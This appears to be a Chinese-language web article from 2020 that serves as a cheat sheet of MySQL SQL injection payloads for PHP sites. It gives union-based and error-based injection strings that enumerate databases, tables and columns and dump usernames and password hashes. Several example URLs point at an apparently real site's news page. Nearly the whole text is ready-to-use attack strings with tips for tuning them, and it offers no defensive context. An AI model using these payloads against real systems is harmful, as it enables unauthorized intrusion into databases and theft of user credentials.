php mysql 經常使用高級注入語句

時間 2020-11-19

標籤 php mysql web sql 數據庫瀏覽器 session ide 函數編碼欄目 PHP 简体版

原文原文鏈接

盲注查詢：php

and (select count(*) from mysql.user)>0/* 查看權限mysql

1:system_user() 系統用戶名web

2:user() 用戶名sql

3:current_user 當前用戶名數據庫

4:session_user()鏈接數據庫的用戶名瀏覽器

5:database() 數據庫名session

6:version() MYSQL數據庫版本ide

7:load_file() MYSQL讀取本地文件的函數函數

8:@@datadir 讀取數據庫路徑編碼

9:@@basedir MYSQL 安裝路徑

10:@@version_compile_os 操做系統 Windows Server 2003,

############################################################################################################

查看用戶和密碼：

http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12+from+mysql.user

查看有多少列：select 。。。 from information_schema.SCHEMATA–

查詢當前用戶:

Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r

and(0)*2))x+from+information_schema.tables+group+by+x)a)

用戶數據庫名稱數據庫版本：

and+substring(@@version,1,1)=4

and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13/*

有時加上「/*」會報錯，因此此時須要去掉「/*」

######################################### 暴庫 ######################################################

and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7,8,9,10,11 from information_schema.SCHEMATA limit 1,1/*

其中「limit 1,1」中前面的數字「1」能夠增長來查看多個庫（有時加上「/*」會報錯，因此此時須要去掉「/*」）

暴全部庫：

+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns

讀出全部庫:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改「LIMIT 0,1」此處的0可看多個庫

爆當前數據庫

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

查詢當前數據庫:

Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo

or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

####################################################################################################################################################################################################################################################################################################################################

#################################### 快速爆表 #####################################################

爆全部表

and+1=2+union+select+1,group_concat(distinct+table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()

爆全部表

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12+from+information_schema.tables+where+table_schema=0x666C6965725F6462617365 或者=（ database() ）也行

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =庫的16進制編碼 limit 1,1/*

有時加上「/*」會報錯，因此此時須要去掉「/*」

+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.tables+where+table_schema=0x697266+order+by+table_schema+limit+0,1)t+limit+1--

注：「table_schema=0x697266」爲上面查到的庫的hex值且「limit+0,1)」中的0可一直增長查看多個表

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x70726F64756374 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改「table_schema」後面的「limit 0,1」中的0可爆多個表

############################################## 快速暴字段 ########################################

and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16進制編碼 limit 1,1/*

limit 從0開始遞增，查詢到時瀏覽器返回錯誤，說明此表存在N-1個字段。

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572

讀出全部表字段:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)爲admin的ascii碼依次類推

and+1=2+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.columns+where+table_name=爆出來的表名的hex值+and+table_schema=數據庫名的hex值+order+by+1+limit+0,1)t+limit+1--

注：其中「limit+0,1)」中的0能夠一直增長來查看多個字段

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改「table_name」後面的「limit 0,1」可爆多個字段

################################# 查看字段內容： #############################################

and+1=2+union+select+1,2,3,concat(md_pw),5,6,7,8,9,10,11,12,13+from+MemberData

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12+from+pub_webmaster

and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*

union select 1,group_concat(username,0x3a,password),3,4,5... from 表（或表的hex值）

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1